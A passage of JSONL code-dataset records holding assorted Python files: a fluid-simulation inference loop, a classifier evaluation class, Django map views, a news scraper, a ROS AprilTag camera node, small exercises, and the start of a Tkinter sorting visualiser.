load_model_path.replace('//','/'))\n\n sub_path = create_base_dir(base_path+learning_dir, '/start_' + str(starting_frame).zfill(6) + '_'+model_id+\n '_pert'+str(training_dict['dataset_characteristics'][0][0])+'-'+str(training_dict['dataset_characteristics'][0][1])+'_')\n os.mkdir(sub_path+'/plots')\n\n initial_vel = np.load(training_dict['dataset'] + 'velocity_' + str(starting_frame).zfill(6) + '.npz')['arr_0']\n initial_pre = np.load(training_dict['dataset'] + 'pressure_' + str(starting_frame).zfill(6) + '.npz')['arr_0']\n vel_np = StaggeredGrid(initial_vel, velocity.box).at(velocity)\n p_np = CenteredGrid(initial_pre, pressure.box).at(pressure)\n np.savez(sub_path + '/velocity_' + str(0).zfill(6), vel_np.staggered_tensor())\n np.savez(sub_path + '/pressure_' + str(0).zfill(6), p_np.data)\n if residual_force_data is not None:\n np.savez(sub_path + '/nn_forcing_' + str(0).zfill(6), np.zeros_like(vel_np.staggered_tensor()))\n\n for i in range(1,timesteps):\n # BOUNDARY CONDITION - PERTURBATION -----------------------------------------------------------------------\n if training_dict['perturb_inlet'] == True:\n boundary_perturbation = boundary_perturbation_fun_new(bc_placeholders.shape, simulation_parameters['dt']*starting_frame+\n simulation_parameters['dt']*simulation_parameters['dt_ratio']*i)\n else:\n boundary_perturbation = np.zeros(bc_placeholders.shape)\n\n s = time.time()\n vel_out, p_out, nn_out = sess.run([velnew_data, pnew_data, residual_force_data],\n feed_dict={velocity_placeholder: vel_np.staggered_tensor(),\n pressure_placeholder: p_np.data,\n bc_placeholders: boundary_perturbation})\n f = time.time()\n performance.append(f-s)\n np.savez(sub_path + '/velocity_' + str(i).zfill(6), vel_out)\n np.savez(sub_path + '/pressure_' + str(i).zfill(6), p_out)\n if residual_force_data is not None:\n np.savez(sub_path + '/nn_forcing_' + str(i).zfill(6), nn_out)\n\n if i%50==0:\n plt.figure(figsize=(8,12))\n plt.subplot(5,1,1)\n plt.title(\"v velocity\")\n plt.imshow(vel_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,2)\n plt.title(\"u velocity\")\n plt.imshow(vel_out[0,...,1])\n plt.colorbar()\n plt.subplot(5,1,3)\n plt.title(\"p pressure\")\n plt.imshow(p_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,4)\n plt.title(\"nn forcing y\")\n plt.imshow(nn_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,5)\n plt.title(\"nn forcing x\")\n plt.imshow(nn_out[0,...,1])\n plt.colorbar()\n plt.savefig(sub_path+'/plots/plt_'+str(i))\n plt.close()\n\n vel_np = StaggeredGrid(vel_out, velocity.box)\n p_np = CenteredGrid(p_out, pressure.box)\n\nnp.savez(sub_path+'/performance_'+socket.gethostname(), np.array(performance))","repo_name":"tum-pbs/differentiable-piso","sub_path":"spatial_mixing_layer_differentiable_inference.py","file_name":"spatial_mixing_layer_differentiable_inference.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"45"} +{"seq_id":"38969791809","text":"import numpy as np\n\n\nclass Evaluator:\n def __init__(self, y_prediction, y_gold, class_labels):\n \"\"\"\n Args:\n y_gold (np.ndarray): the correct ground truth/gold standard labels\n y_prediction (np.ndarray): the predicted labels\n class_labels (np.ndarray): a list of unique class labels. Defaults to the union of y_gold and y_prediction.\n \"\"\"\n assert len(y_gold) == len(y_prediction)\n\n self.y_prediction = y_prediction\n self.y_gold = y_gold\n self.classes = class_labels\n\n # Compute the confusion matrix.\n # self.confusion_matrix: np.array, shape (C, C), where C is the number of classes.\n # Rows are ground truth per class, columns are predictions\n self.confusion = np.zeros((len(self.classes), len(self.classes)))\n for (i, label) in enumerate(self.classes):\n indices = (self.y_gold == label)\n predictions = self.y_prediction[indices]\n\n (unique_labels, counts) = np.unique(predictions, return_counts=True)\n\n frequency_dict = dict(zip(unique_labels, counts))\n\n for (j, class_label) in enumerate(self.classes):\n self.confusion[i, j] = frequency_dict.get(class_label, 0)\n\n def accuracy(self):\n \"\"\"\n Compute the accuracy given the ground truth and predictions\n\n Returns:\n float : the accuracy\n \"\"\"\n try:\n return np.sum(self.y_gold == self.y_prediction) / len(self.y_gold)\n except ZeroDivisionError:\n return 0.\n\n @staticmethod\n def accuracy_from_confusion(confusion):\n \"\"\"\n Compute the accuracy given the confusion matrix\n Returns:\n float : the accuracy\n \"\"\"\n\n if np.sum(confusion) > 0:\n return np.sum(np.diag(confusion)) / np.sum(confusion)\n else:\n return 0.\n\n @staticmethod\n def precision(confusion):\n \"\"\"\n Compute the precision score per class given the ground truth and predictions\n Also return the macro-averaged precision across classes.\n Returns:\n tuple: returns a tuple (precisions, macro_precision) where\n - precisions is a np.ndarray of shape (C,), where each element is the\n precision for class c\n - macro-precision is macro-averaged precision (a float)\n \"\"\"\n\n p = np.zeros((len(confusion),))\n for c in range(confusion.shape[0]):\n if np.sum(confusion[:, c]) > 0:\n p[c] = confusion[c, c] / np.sum(confusion[:, c])\n\n # Compute the macro-averaged precision\n macro_p = 0.\n if len(p) > 0:\n macro_p = np.mean(p)\n\n return p, macro_p\n\n @staticmethod\n def recall(confusion):\n \"\"\"\n Compute the recall score per class given the ground truth and predictions\n Also return the macro-averaged recall across classes.\n Returns:\n tuple: returns a tuple (recalls, macro_recall) where\n - recalls is a np.ndarray of shape (C,), where each element is the\n recall for class c\n - macro-recall is macro-averaged recall (a float)\n \"\"\"\n\n r = np.zeros((len(confusion),))\n for c in range(confusion.shape[0]):\n if np.sum(confusion[c, :]) > 0:\n r[c] = confusion[c, c] / np.sum(confusion[c, :])\n\n # Compute the macro-averaged recall\n macro_r = 0.\n if len(r) > 0:\n macro_r = np.mean(r)\n\n return r, macro_r\n\n @staticmethod\n def f1_score(confusion):\n \"\"\"\n Compute the F1-score per class given the ground truth and predictions\n Also return the macro-averaged F1-score across classes.\n Returns:\n tuple: returns a tuple (f1s, macro_f1) where\n - f1s is a np.ndarray of shape (C,), where each element is the\n f1-score for class c\n - macro-f1 is macro-averaged f1-score (a float)\n \"\"\"\n\n (precisions, macro_p) = Evaluator.precision(confusion)\n (recalls, macro_r) = Evaluator.recall(confusion)\n\n # just to make sure they are of the same length\n assert len(precisions) == len(recalls)\n\n f = np.zeros((len(precisions),))\n for c, (p, r) in enumerate(zip(precisions, recalls)):\n if p + r > 0:\n f[c] = 2 * p * r / (p + r)\n\n # Compute the macro-averaged F1\n macro_f = 0.\n if len(f) > 0:\n macro_f = np.mean(f)\n\n return f, macro_f\n\n def get_confusion_by_label(self, label):\n \"\"\"\n\n Args:\n label: the specific label we want to compute confusion matrix for\n\n Returns:\n confusion matrix by class\n \"\"\"\n confusion = np.zeros((2, 2))\n\n confusion[0, 0] = len([i for (i, v) in enumerate(self.y_prediction) if self.y_gold[i] == self.y_gold[i]\n and v == label])\n confusion[0, 1] = len(self.y_gold == label) - confusion[0, 0]\n confusion[1, 0] = len(self.y_prediction == label) - confusion[0, 0]\n confusion[1, 1] = len(self.y_gold != label) - confusion[1, 0]\n\n return confusion\n\n @staticmethod\n def get_confusion_by_label_from_confusion(label, confusion):\n \"\"\"\n\n Args:\n label: the index of the specific label in classes, we want to compute confusion matrix for this specific label\n confusion: original multi-class confusion matrix\n Returns:\n confusion matrix by class\n \"\"\"\n assert label < len(confusion)\n\n label_confusion = np.zeros((2, 2))\n label_confusion[0, 0] = confusion[label, label]\n label_confusion[0, 1] = np.sum(confusion[label, :]) - label_confusion[0, 0]\n label_confusion[1, 0] = np.sum(confusion[:, label]) - label_confusion[0, 0]\n label_confusion[1, 1] = np.sum(confusion) - label_confusion[0, 0] - label_confusion[0, 1] - label_confusion[1, 0]\n\n return label_confusion\n","repo_name":"yisiang-ong/decision_tree","sub_path":"Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30898366020","text":"from multiprocessing import context\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Site\nimport folium\n\n\ndef index(request):\n context = {}\n query = ''\n if request.GET:\n query = request.GET['q']\n context['query'] = str(query)\n\n bgzsites = Site.objects.get_queryset()\n print(bgzsites)\n\n if len(bgzsites):\n\n m = folium.Map(width=600, height=300,location=[32.098084,20.091047], zoom_start=13)\n for i in range(0,len(bgzsites)):\n folium.Marker([bgzsites[i].siteLatitude, bgzsites[i].siteLongitude], popup=bgzsites[i].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'bgzsites':bgzsites,\n 'MAP':m\n }\n return render(request, 'home.html',context)\n\n\ndef city(request, cityName):\n cityName = str(cityName)\n print(cityName)\n citySites = Site.objects.filter(siteCity=cityName)\n # except Eastsites.DoesNotExist:\n print(citySites[0].siteLatitude)\n m = folium.Map(width=600, height=300,location=[citySites[0].siteLatitude, citySites[0].siteLongitude], zoom_start=13)\n # tooltip = 'Click For More Info'\n for i in range(0,len(citySites)):\n folium.Marker([citySites[i].siteLatitude, citySites[i].siteLongitude], popup=citySites[i].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'citySites':citySites,\n 'MAP':m\n }\n return render(request, \"cities.html\", context)\n\n\n\ndef site(request, pk):\n print(pk)\n singleSite = Site.objects.filter(id=pk)\n print(singleSite[0])\n m = folium.Map(width=600, height=300,location=[singleSite[0].siteLatitude, singleSite[0].siteLongitude], zoom_start=13)\n folium.Marker([singleSite[0].siteLatitude, singleSite[0].siteLongitude], popup=singleSite[0].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'singleSite': singleSite[0],\n 'MAP':m\n }\n return render(request, \"single.html\",context)","repo_name":"Muftah-Elzawi/LTT-Docs-Site","sub_path":"EastSites/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26806375772","text":"text = \"{[()]}\"\ndef is_closed(text:str):\n stack = []\n brackets = {')':'(',']':'[','}':'{'}\n for char in text:\n if char in brackets.values():\n stack.append(char)\n elif char in brackets.keys():\n if brackets[char] != stack.pop():\n return False\n return True\n\nprint(is_closed(text))\n\n\n\n","repo_name":"sctu/sctu-ds-2019","sub_path":"1806101093王宇/lab02/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"40810738887","text":"class Solution:\n def numberOfWays(self, s: str) -> int:\n number_10 = defaultdict(int)\n number_01 = defaultdict(int)\n number_101 = number_010 = count_0 = count_1 = cur_01 = cur_10 = 0\n for i in range(len(s)):\n if s[i] == '1':\n count_1 += 1\n number_01[i] = count_0 + cur_01\n cur_01 = number_01[i]\n number_10[i] = cur_10\n \n if s[i] == '0':\n count_0 += 1\n number_10[i] = count_1 + cur_10\n cur_10 = number_10[i]\n number_01[i] = cur_01\n \n for i in range(len(s)):\n if s[i] == '1':\n number_101 += number_10[i]\n else:\n number_010 += number_01[i]\n \n return number_101 + number_010\n","repo_name":"birukayalew/Competitive-Programming","sub_path":"2222-number-of-ways-to-select-buildings/2222-number-of-ways-to-select-buildings.py","file_name":"2222-number-of-ways-to-select-buildings.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"69964068935","text":"# -*- coding: utf-8 -*-\n\"\"\"isolezwelesixhosa_scrap_links.ipynb\nCode for scrapping news text from https://www.isolezwelesixhosa.co.za\n\nAuthor: Jesujoba Alabi\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom urllib.request import Request, urlopen\nagent = {\"User-Agent\":'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'}\n\n#define new category aside from the home page\ncategory = ['iindaba','ezemidlalo','ezoyolo','izimvo']\n#get the number of `featured` pages each of the categories have\ndef get_no_featuredpages(catgory):\n url = \"https://www.isolezwelesixhosa.co.za/\"+catgory+\"?filter_by=featured\"\n reqs = requests.get(url, headers=agent)\n soup = BeautifulSoup(reqs.content, 'lxml')\n res = soup.find('span',{'class':'pages'})\n return int(res.text.split()[-1])\n\n#scrap links from the different categories \ndef scrap_link(catgory, catgory_size):\n urls = []\n print(\"Getting the URL from the category : \", catgory, \" (featured) with \", catgory_size, \" pages . \" )\n for p in range(catgory_size):\n url = 'https://www.isolezwelesixhosa.co.za/'+catgory+'/page/'+str(p+1)+'?filter_by=featured'\n #print(url)\n reqs = requests.get(url, headers=agent)\n soup = BeautifulSoup(reqs.content, 'lxml')\n res = soup.find_all('div',{'class':'td-module-thumb'})#.find_all(\"a\", href=True)\n #print(res)\n urls.extend([t.a['href'] for t in res])\n #return all the news article links from the category\n return urls\n\n#scrap the articles with links in the `urls` variable\ndef getSoup(links):\n print(\"getting soup objects for all the links ... \")\n soupx = []\n cnt=0\n for url in links: \n page_request = request.Request(url, headers=agent)\n page = request.urlopen(page_request)\n #response = requests.get(page_url)\n #print(page.getcode())\n soup = BeautifulSoup(page, 'html.parser')\n soupx.append(soup)\n cnt = cnt + 1\n progresse = (cnt/len(links) * 100) \n if progresse % 10 == 0:\n print (\"Got \", progresse, \"% of soup objects\")\n print(\"got the soup object for all the links ... \")\n return soupx\n\ndef getcontent(soupx):\n print(\"scrapping the articles ... \")\n cnt=0;\n title=[];time=[]; texts=[]\n for soups in soupx:\n cnt=cnt+1\n if soups.find(\"h1\", {\"class\":\"entry-title\"})!= None:\n title.append(soups.find(\"h1\", {\"class\":\"entry-title\"}).text.replace(\"\\t\",\"\").replace(\"\\n\",\"\"))\n else:\n title.append(\"\")\n if soups.find(\"time\", {\"class\":\"entry-date updated td-module-date\"})!= None:\n time.append(soups.find(\"time\", {\"class\":\"entry-date updated td-module-date\"}).text.replace(\"\\t\",\"\").replace(\"\\n\",\"\"))\n else:\n time.append(\"\")\n \n if soups.find(\"div\", {\"class\":\"td-post-content\"})!=None:\n result = soups.find(\"div\", {\"class\":\"td-post-content\"}).findAll('p')\n txtstring=\"\"\n for x in result:\n #print (x.text)\n txtstring+=x.text.replace(u'\\xa0', u' ').replace('\\n',\" \")+\" \\n\"\n texts.append(txtstring.strip())\n else:\n texts.append(\"\") \n\n progresse = (cnt/len(soupx) * 100) \n if progresse % 10 == 0:\n print (\"Scrapped \", progresse, \"% of the articles\")\n\n return title,time,texts\n\ncat_len = [get_no_featuredpages(cat) for cat in category]\nprint(\"Got the following size for each category = \", cat_len)\nurls = set([scrap_link(category[i], cat_len[i]) for i in range(len(category))][0])\n\nsoups = getSoup(list(urls))\ntitle,time,texts = getcontent(soups)\n#create a dictionarty\nimport pandas as pd\nd = {'Date':time,'Title':title,'Text':texts}\ndf = pd.DataFrame(d)\n\nprint(df)\n\n#write the dataframe to file\ndf.to_csv(r'xhosa_news.csv')\n\n","repo_name":"ajesujoba/afrikcrawler","sub_path":"isolezwelesixhosa/isolezwelesixhosa_scrap_links.py","file_name":"isolezwelesixhosa_scrap_links.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73576658055","text":"from datetime import datetime\nfrom pydantic import validate_arguments\n\nclass ConfiguracaoDTO:\n @validate_arguments\n def __init__(self, status:bool, aluno_ausente:int, inicio_aula:datetime, fim_aula:datetime):\n self.status = status\n self.aluno_ausente = aluno_ausente\n self.inicio_aula = inicio_aula\n self.fim_aula = fim_aula\n\n","repo_name":"xtokram/app-presente","sub_path":"backend/src/dtos/ConfiguracaoDTO.py","file_name":"ConfiguracaoDTO.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"73609179642","text":"# -*- coding: utf-8 -*-\n# @File : sentence_split.py\n# @Author: ChangSiteng\n# @Date : 2019-06-26\n# @Desc : 1. 分词的工作\n# 2. 表情符号切分的工作\nimport shutil\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nimport json\nimport pickle\nimport re\n\nimport jieba\n\nfrom data_utils.nlpcc_parse import Parse\n\npunctuations = [',', '。', '?', '~', '!', '、', '……']\n\nclass SentenceSplit:\n\n datas = []\n pattern = ''\n emoji_pattern = ''\n\n def __init__(self,path):\n parse = Parse()\n self.datas = parse.parse(path)\n self.pattern = SentenceSplit.get_pattern()\n self.emoji_pattern = r'\\[(\\w*)\\]'\n\n # 静态方法\n @staticmethod\n def get_pattern():\n pattern = ''\n for punctuation in punctuations:\n pattern += punctuation + \"|\"\n pattern = pattern[:-1]\n return pattern\n\n def sentence_split(self, path, iftrain):\n # 这里是获取的每一句话,需要做分词的工作,我们再在这里做将表情符号切分的工作\n for example in self.datas:\n # print(sentence)\n sentence = example['sentence']\n sentence_no_emoji_split = ''\n emoji_list = []\n emoji_count = []\n # 1 首先表情符号的纯文本\n sentence_no_emoji = re.sub(self.emoji_pattern, '', sentence)\n # 2 按照标点符号切分子句\n short_sentences = re.split(self.pattern,sentence)\n punctuations = re.findall(self.pattern,sentence) # 为了保持标点符号的一致\n # 3在每个子句中看是否有表情符号,这是因为子句后的表情符号会对子句产生影响\n for short_sentence in short_sentences:\n if short_sentence.strip() == '':\n continue\n emojis = re.findall(self.emoji_pattern, short_sentence)\n print(emojis)\n emoji_list.append(list(emojis))\n\n # 4根据除去表情符号的子句,再分词\n short_entence_no_emoji = re.sub(r'\\[(\\w*)\\]', '', short_sentence)\n sentence_no_emoji_split_temp = \" \".join(self.word_split(short_entence_no_emoji))\n sentence_no_emoji_split = sentence_no_emoji_split + str(sentence_no_emoji_split_temp)\n index = short_sentences.index(short_sentence)\n if len(punctuations) > index:\n sentence_no_emoji_split = sentence_no_emoji_split + punctuations[index]\n\n example['sentence_no_emoji'] = sentence_no_emoji\n example['emoji'] = (emoji_list)\n example['sentence_no_emoji_split'] = sentence_no_emoji_split\n\n #https://blog.csdn.net/weixin_43896398/article/details/85559172\n # torchtext能够读取的json文件和我们一般意义上的json文件格式是不同的(这也是比较坑的地方),我们需要把上面的数据处理成如下格式:\n #\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n #可以看到,里面的内容和通常的Json并无区别,每个字段采用字典的格式存储。\n # 不同的是,多个json序列中间是以换行符隔开的,而且最外面没有列表。\n\n with open(path, 'w+') as fw:\n for example_data in self.datas:\n encode_json = json.dumps(example_data)\n # 一行一行写入,并且采用print到文件的方式\n print(encode_json, file=fw)\n\n # json_data = json.dumps(self.datas)\n # with open(path, 'w+',encoding='utf-8') as f_six: # w+用于读写,覆盖\n # f_six.write(json_data)\n print(\"load data并保存在\",path)\n\n if iftrain:\n # 将分好的词划分出来,拼接到一起,方便glove训练\n with open('words_origin.txt','w+') as fw:\n for example_data in self.datas:\n print(example_data['sentence_no_emoji_split'],file=fw)\n print(\"分词TXT已经保存在words_origin.txt中\")\n # 将表情符单词 供glove词向量\n with open('emojis_origin.txt','w+') as fw:\n for example_data in self.datas:\n temp = ''\n emojis_origin = example_data['emoji']\n for emoji_origin in emojis_origin:\n if len(emoji_origin) > 0:\n for emoji_temp in emoji_origin:\n temp += emoji_temp + ' '\n if len(temp) > 0 :\n print(temp,file=fw)\n print(\"表情分词TXT已经保存在emojis_origin.txt中\")\n\n\n def word_split(self,sentence):\n\n return list(sentence)\n\n\nif __name__=='__main__':\n\n # train_xml_path = \"../../data/nlpcc2014/Training data for Emotion Classification.xml\"\n # split = SentenceSplit(train_xml_path)\n # split.sentence_split(\"../data/train_data.json\",True)\n #\n # train_xml_path = \"../../data/nlpcc2014/EmotionClassficationTest.xml\"\n # split = SentenceSplit(train_xml_path)\n # split.sentence_split(\"../data/test_data.json\",False)\n\n '''\n 2.\n words_origin.txt\\emoji_origin.txt放入glove中,demo.sh, 得到glove.emojis.300.vectors.txt、glove.words.300.vectors.txt\n '''\n glove_words_origin_path = \"../../Glove/words_origin.txt\"\n shutil.copy(\"words_origin.txt\",glove_words_origin_path)\n glove_emojis_origin_path = \"../../Glove/emojis_origin.txt\"\n shutil.copy(\"emojis_origin.txt\", glove_emojis_origin_path)\n os.system('cd ../../Glove && ./demo.sh')\n os.system('cd ../../Glove && ./demo1.sh')\n '''\n 3.\n 得到的glove.emojis.300.vectors.txt、glove.words.300.vectors.txt放入.vector_cache中\n '''\n glove_words_300_vector_path = \"../../Glove/glove.words.300.vectors.txt\"\n shutil.copy(glove_words_300_vector_path,\"../.vector_cache/glove.words.300.vectors.txt\")\n glove_emojis_300_vector_path = \"../../Glove/glove.emojis.300.vectors.txt\"\n shutil.copy(glove_emojis_300_vector_path,\"../.vector_cache/glove.emojis.300.vectors.txt\")","repo_name":"CstomRita/AS-LSTM","sub_path":"train_06_character/data/sentence_split.py","file_name":"sentence_split.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"72339515962","text":"#!/usr/bin/env python3\n\nimport cv2\nimport rospy\nimport argparse\nimport apriltag\nfrom std_msgs.msg import String\nimport time\nimport math\n\n\nlist = [[304, 112], [304, 361], []]\n\n\nclass CameraDriver:\n def __init__(self, args):\n rospy.init_node('camera_driver')\n self.pub1 = rospy.Publisher(\"apriltag_centre1\", String, queue_size=1)\n self.last = time.time()\n self.debug = args.debug\n self.source = int(\n args.source) if args.source.isdigit() else args.source\n\n def publish(self):\n cap = cv2.VideoCapture(self.source)\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n print(cap.get(cv2.CAP_PROP_FPS))\n\n while cap.isOpened() and not rospy.is_shutdown():\n ret, frame = cap.read()\n now = time.time()\n now = now-self.last\n self.last = self.last+now\n if not ret:\n break\n try:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n options = apriltag.DetectorOptions('tag36h11')\n detector = apriltag.Detector(options)\n results = detector.detect(gray)\n pStr = \"FPS: {} delay : {}ms \".format(\n int(1/now), int(1000*now))\n for i in results:\n pta, ptb, ptc, ptd = i.corners\n cn = i.center\n pta = (int(pta[0]), int(pta[1]))\n ptb = (int(ptb[0]), int(ptb[1]))\n ptc = (int(ptc[0]), int(ptc[1]))\n ptd = (int(ptd[0]), int(ptd[1]))\n pte = (int((pta[0]+ptb[0])/2), int((pta[1]+ptb[1])/2))\n cn = (int(cn[0]), int(cn[1]))\n pStr += \"Center []: {},{} \".format(cn[0], cn[1])\n cv2.rectangle(frame, pta, ptc, (0, 255, 0), 2)\n cv2.circle(frame, cn, 3, (0, 0, 255), -1)\n cv2.circle(frame, pte, 3, (0, 0, 255), -1)\n theta = math.degrees(math.atan2(\n pte[1]-cn[1], pte[0]-cn[0]))\n ptr = str(cn[0])+\" \"+str(cn[1])+\" \"+str(theta)\n print(ptr)\n self.pub1.publish(ptr)\n print(pStr)\n if self.debug:\n frame = cv2.line(\n frame, (list[1][0], list[1][1]), (list[0][0], list[0][1]), (0, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n pass\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Camera Driver')\n parser.add_argument('source', nargs='?', type=str, default='0')\n parser.add_argument('-d', '--debug', type=bool, default='true')\n parser.add_argument('-t', '--topic', type=str,\n default='/overhead_camera/image_raw')\n args = parser.parse_args()\n\n camera_driver = CameraDriver(args)\n try:\n camera_driver.publish()\n except Exception as e:\n print(e)\n","repo_name":"Alok-ux/FlipkartGrid","sub_path":"grid_utils/apriltag_detector/scripts/camera_driver_new.py","file_name":"camera_driver_new.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"11201634488","text":"from selenium import webdriver\r\nfrom time import sleep\r\n\r\n\r\ndef open_browser():\r\n teamnumber = 3751\r\n PATH = r\"D:\\python\\Space ac\\US-cansat\\chromedriver.exe\"\r\n driver = webdriver.Chrome(PATH)\r\n driver.get(\"http://cansat.info/plot.html\")\r\n driver.find_element_by_id(\"team\").send_keys(teamnumber)\r\n driver.find_element_by_xpath(\"/html/body/p[8]/button\").click()\r\n sleep(10000)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n open_browser()\r\n","repo_name":"Retaehc-pop/US-cansat","sub_path":"Groundstation/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"26270150819","text":"\n\nimport pytest\n\nfrom .conftest import get_config\n\n\n@pytest.mark.parametrize('fixture,is_test', [\n ('true', True),\n ('no-key', False),\n ('false', False),\n])\ndef test_is_test(fixture, is_test):\n\n config = get_config('is_test/{0}'.format(fixture))\n\n assert config.is_test() == is_test\n","repo_name":"davidmcclure/open-syllabus-project","sub_path":"osp/test/common/config/test_is_test.py","file_name":"test_is_test.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"41"} +{"seq_id":"21331706345","text":"import pickle\n\nimport requests\n\nfrom django.conf import settings\n\n\ndef get_balances(*addresses, use_cache=False):\n retval = {}\n\n if use_cache:\n for address in addresses:\n balance = settings.REDIS.get(f'{address}_balance')\n if balance is not None:\n retval[address] = balance\n\n if set(addresses) != set(retval) and addresses:\n resp = requests.get(\n f'https://api.blockchair.com/bitcoin/addresses/balances?addresses={\",\".join(addresses)}'\n )\n resp.raise_for_status()\n data = resp.json()['data'] or {}\n for address, satoshis in data.items():\n retval[address] = satoshis\n settings.REDIS.set(f'{address}_balance', satoshis)\n return retval\n\n\ndef get_transactions(address, use_cache=False):\n retval = []\n\n if use_cache:\n transactions = settings.REDIS.get(f'{address}_transactions')\n if transactions:\n retval = pickle.loads(transactions)\n\n if not retval:\n resp = requests.get(\n f'https://bch-chain.api.btc.com/v3/address/{address}/tx'\n )\n try:\n resp.raise_for_status()\n except requests.HTTPError:\n retval = []\n else:\n retval = resp.json()['data']['list']\n settings.REDIS.set(\n f'{address}_transactions',\n pickle.dumps(retval)\n )\n return retval\n","repo_name":"nav3van/bitcoin-tracker","sub_path":"app/bitcoin_tracker/util/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4359178146","text":"n = int(input())\nm = int(input())\nsymb = input()\n\nfor i in range(n):\n if not i or i == n - 1:\n print(symb * m)\n continue\n for j in range(m):\n if not j or j == m - 1:\n print(symb, end='')\n else:\n print(' ', end='')\n print()\n","repo_name":"hom1c1d3/yandex_lyceum","sub_path":"Основы программирования на языке Python/8. Вложенные циклы/rectangle_ascii.py","file_name":"rectangle_ascii.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"21128684054","text":"#kullanıcı 3 sayı girsin bunlardan en büyüğünü versin\nsayi1 = int(input (\"sayi 1:\"))\nsayi2 = int(input (\"sayi 2:\"))\nsayi3 = int(input (\"sayi 3:\"))\n\nif sayi1>sayi2 and sayi1>sayi3:\n print (\"en büyük sayi1\")\nelif sayi2>sayi1 and sayi2>sayi3:\n print (\"en büyük sayi2\")\nelif sayi3>sayi1 and sayi3>sayi2:\n print (\"en büyük sayi 3. sayı olan\", sayi3)","repo_name":"cgtyyldrm/PythonKamp","sub_path":"workshop4.py","file_name":"workshop4.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"283303693","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport random\r\nimport sort_algorithms\r\n\r\nveri = []\r\nroot = Tk()\r\nroot.title(\"Sıralama Algoritması Görselleştirici\")\r\nroot.maxsize(800,500)\r\nroot.config(bg=\"black\")\r\nsecilen_algoritma = StringVar()\r\n\r\ndef grafik_olustur(veri):\r\n canvas.delete(\"all\")\r\n canvas_height = 280\r\n canvas_width = 450\r\n x_width = canvas_width / (len(veri)+1)\r\n for i in range(len(veri)):\r\n x1 = i * x_width + 30\r\n y1 = canvas_height - veri[i]\r\n x2 = (i+1) * x_width + 10\r\n y2 = canvas_height\r\n canvas.create_rectangle(x1,y1,x2,y2,fill=\"purple\")\r\n canvas.create_text(x1+2,y1,anchor=SW,text=str(veri[i]))\r\n root.update_idletasks()\r\n\r\ndef rastgele_olustur():\r\n global veri\r\n if min_deger.get() == \"\":\r\n min = 1\r\n else:\r\n min = int(min_deger.get())\r\n if max_deger.get() == \"\":\r\n max = 100\r\n else:\r\n max = int(max_deger.get())\r\n if boyut.get() == \"\":\r\n size = 10\r\n else:\r\n size = int(boyut.get())\r\n veri = []\r\n for i in range(size):\r\n veri.append(random.randrange(min,max+1))\r\n grafik_olustur(veri)\r\n\r\ndef baslat():\r\n global veri\r\n if veri == []:\r\n messagebox.showinfo(title=\"Dikkat\", message=\"Lütfen önce rastgele verileri oluşturun.\")\r\n if algoritma_menusu.get() == \"Bubble 